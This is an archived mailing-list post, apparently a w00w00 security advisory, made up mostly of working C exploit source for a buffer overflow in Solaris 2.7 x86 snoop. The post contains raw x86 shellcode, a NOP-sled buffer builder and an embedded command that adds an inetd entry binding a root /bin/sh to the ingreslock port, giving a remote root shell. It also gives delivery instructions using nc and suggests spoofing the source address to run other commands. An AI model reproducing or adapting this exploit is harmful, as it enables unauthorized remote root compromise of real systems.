w00w00 Security Development (WSD) http://www.w00w00.org/advisories.html Discovered by: K2 (ktwoat_private) Hi, Here's a new version of my snoop exploit, it seems that it will work on the new patched version of snoop aswell, and actually, the target host dose NOT have to be running with -v. Some interesting applications would be to spoof the source and have it issue a remote command other then loading a portshell. K2 w00w00 /* by: K2, version .2 this is a funny Solaris. remote Solaris 2.7 x86 snoop exploit rm /tmp/w0 yourself!&@$*(&$!*(@*$&()%RW run with ( ./snp ) | nc -u target_host_network 53 requires target host to be running "snoop" verified with patch 108483-01 thx str/horizon for shellcodes. Hi plageuz Hi mom. */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> char shell[] = "\xEB\x37\x5E\x8D\x5E\x10\x89\x1E\x83\xC3\x08\x89" "\x5E\x04\x83\xC3\x03\x89\x5E\x08\x83\xEB\x0B\x8D" "\x0E\x89\xCA\x33\xC0\x89\x46\x0C\x89\x46\xF5\x89" "\x46\xFA\x88\x46\x17\x88\x46\x1A\xB0\x3B\x52\x51" "\x53\x50\x9A\x73\x74\x72\x6E\x07\x72\xE8\xC4\xFF" "\xFF\xFF\x31\x33\x20\x4A\x61\x6E\x20\x31\x39\x39" "\x38\x2D\x2D\x73\x74\x72\x2F\x62\x69\x6E\x2F\x73" "\x68\x28\x2D\x63\x29 echo w00w00;echo \"ingreslock" "stream tcp nowait root /bin/sh sh -i\" >>/tmp/w0;" "/usr/sbin/inetd -s /tmp/w0;/bin/rm -f /tmp/w0"; #define SIZE 2048 #define NOPDEF 349 #define DEFOFF 0 const char x86_nop=0x90; long nop=NOPDEF,esp=0x804646c; long offset=DEFOFF; char buffer[SIZE]; int main (int argc, char *argv[]) { int i; if (argc > 1) offset += strtol(argv[1], NULL, 0); if (argc > 2) nop += strtoul(argv[2], NULL, 0); memset(buffer, x86_nop, SIZE); memcpy(buffer+nop, shell, strlen(shell)); for (i = nop+strlen(shell); i < SIZE-4; i += 4) { *((int *) &buffer[i]) = esp+offset; } fprintf(stderr,"0x%x\n",esp+offset); printf("%s", buffer); return 0; }
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:19:27 PDT